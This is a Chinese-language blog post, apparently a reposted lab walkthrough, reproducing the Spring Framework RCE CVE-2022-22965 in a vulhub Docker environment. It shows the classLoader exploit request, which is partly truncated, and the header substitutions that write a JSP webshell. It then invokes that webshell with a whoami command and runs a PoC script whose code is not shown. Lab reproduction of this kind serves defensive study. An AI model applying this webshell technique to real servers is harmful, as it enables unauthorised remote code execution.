Spring Framework远程代码执行漏洞_CVE-2022-22965复现

admin 2022年4月7日23:21:11评论91 views字数 1522阅读5分4秒阅读模式
✎ 阅读须知


乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!

本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!

本文首发乌鸦安全知识星球,更新时间:2022.04.01

1. 漏洞介绍

Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为 J2EE 应用程序开发提供了一个好用的框架。当Spring部署在JDK9及以上版本,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。

2. 漏洞复现

目前可以借助vulhub一键复现该漏洞:

https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965

在当前目录下使用命令:docker-compose up -d即可一键开启环境:

Spring Framework远程代码执行漏洞_CVE-2022-22965复现

看到当前的端口开在了8080

Spring Framework远程代码执行漏洞_CVE-2022-22965复现

打开页面之后,可以看到当前服务已经起来了:

http://127.0.0.1:8080/

Spring Framework远程代码执行漏洞_CVE-2022-22965复现

按照作者的链接:

http://127.0.0.1:8080/?name=Bob&age=25

出现页面:

Spring Framework远程代码执行漏洞_CVE-2022-22965复现

然后根据提示,构造请求地址:(方法不唯一)

http://127.0.0.1:8080/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25

该请求发出之后,需要进行变换:

Spring Framework远程代码执行漏洞_CVE-2022-22965复现

红色部分替换为:

suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Length: 2

效果查看下图:

Spring Framework远程代码执行漏洞_CVE-2022-22965复现

然后访问:

http://10.30.2.146:8080//tomcatwar.jsp?pwd=j&cmd=whoami

执行命令即可!

Spring Framework远程代码执行漏洞_CVE-2022-22965复现
注意,在这里的多次执行会不断的往日志写文件,请勿频繁操作!

3. 工具版

工具:因为考虑到现在的大环境,这里提供的工具仅仅能够在当前环境下使用,不能在其他的环境中使用!

请在后台回复关键字:spring 下载

直接执行脚本即可:

python3 vulhub_CVE-2022-22965_poc.py --url=http://127.0.0.1:8080
Spring Framework远程代码执行漏洞_CVE-2022-22965复现

执行效果:

Spring Framework远程代码执行漏洞_CVE-2022-22965复现

同样,不要多次执行!

4. 注意事项

不要频繁的往里面写,不然日志文件会炸,消除方法就是使用get请求(vulhub专属),停止写日志:

http://127.0.0.1:8080/?class.module.classLoader.resources.context.parent.pipeline.first.pattern= 
Spring Framework远程代码执行漏洞_CVE-2022-22965复现
往期精彩文章




靶场学习 | 记一次对Family靶机的渗透测试
内网渗透-信息收集方法总结
Spring Cloud Function SPEL表达式注入漏洞复现
警惕Spring未知RCE0day Poc、exp钓鱼


Spring Framework远程代码执行漏洞_CVE-2022-22965复现
技术支持:白帽子社区团队
— 扫码关注我们 



原文始发于微信公众号(白帽子社区):Spring Framework远程代码执行漏洞_CVE-2022-22965复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月7日23:21:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Spring Framework远程代码执行漏洞_CVE-2022-22965复现http://cn-sec.com/archives/882253.html

发表评论

匿名网友 填写信息